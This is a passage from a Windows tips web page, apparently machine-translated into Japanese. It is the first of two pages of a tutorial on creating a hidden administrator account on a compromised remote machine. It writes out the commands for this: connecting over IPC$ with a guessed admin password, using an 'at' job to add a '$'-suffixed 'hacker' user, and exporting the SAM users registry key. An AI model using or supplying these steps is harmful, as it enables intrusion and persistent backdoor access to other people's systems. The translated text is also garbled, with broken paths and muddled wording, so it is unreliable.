Windows system >> Windowsの知識 >  >> Windows XPシステムチュートリアル >> XPシステムアプリケーションスキル >> マスターは、スーパーユーザーを隠す方法を要約しています。

マスターは、スーパーユーザーを隠す方法を要約しています。

  

スーパーユーザーは、ネットワークの管理と保守を担当するユーザーです。この用語は、NetWare Web上で特別な意味を持ちます。スーパーユーザーは、すべてのファイル、ディレクトリ、およびファイルへのフルアクセス権を持ち、インストール後にサーバーに最初にログインするユーザーです。スーパーユーザーはすぐにパスワードを変更し、他のユーザーがサーバーにアクセスしてスーパーユーザーに無制限にアクセスすることができないようにします。では、どのようにしてシステム内のスーパーユーザーを隠しますか?ここでは、システム内のさまざまな隠しスーパーユーザーメソッドの一覧を示します。

まず、コマンドラインで隠しスーパーユーザーをリモートで作成する方法

ここではatコマンドを使用します。これは、atで生成されたスケジュール済みタスクがシステムとして実行されるため、psu.exeプログラムは使用されないためです。 atコマンドを使用するには、スケジュールサービスが必要ですが、有効になっていない場合は、ストリーマのnetsvc.exeまたはsc.exeツールを使用してリモートで起動できますが、スケジュールサービスを開始できる限り使用することもできます。

コマンドラインモードでは、MSSQLポート1433への接続にSQLexecを使用するなど、さまざまな接続方法を使用できます。cmdshellを取得でき、atコマンドを実行する権限がある限りはtelnetサービスを使用することもできます。はい。

1.最初にブロイラーを見つけますそれを見つける方法については、それは私がここで述べたトピックではありません。ここでは、管理者のスーパーユーザーと12345678のパスワードを持つブロイラーを見つけたと仮定します。今度はコマンドラインからリモートで隠しスーパーユーザーを作成し始めます。 (例のホストは私のLANのホストです。私のIPアドレスを13.50.97.238に変更しました。通常のIPアドレスを嫌がらないように、インターネットで番号を確認しないでください。)

2まず、ブロイラーとの接続を確立します。コマンドは次のとおりです。net use 13.50.97.238ipc $ "12345678" /user: "administrator

3、atコマンドを使用してブロイラーにユーザーを作成します(atサービスが開始されない場合)。 、netsvc.exeまたはsc.exeでリモートで起動できます。:

at 13.50.97.238 12:51 c:\\ winntsystem32net.exe user hacker $ 1234 /add

これを作成します。ネットユーザを持つユーザは$キャラクタが追加された後にユーザを表示しないので、$キャラクタを持つユーザ名が追加されますが、ユーザはアカウントマネージャに表示されます。

4、atコマンドを使用してHKEY_LOCAL_MACHINEsamsamDomainsaccountusersキーをエクスポートします。

at 13.50.97.238 12:55 c:\\ winntregedit.exe /e hacker.reg

HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers < Br>

/eはregedit.exeのパラメータで、_LOCAL_MACHINESAMSAMDomainsaccountusersキーの末尾になければなりません。必要に応じて、 "c:\\ winntregedit.exe /e hacker.reg"のように引用符を使用できます。HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers'前のページ12次のページ合計2ページ

Copyright © Windowsの知識 All Rights Reserved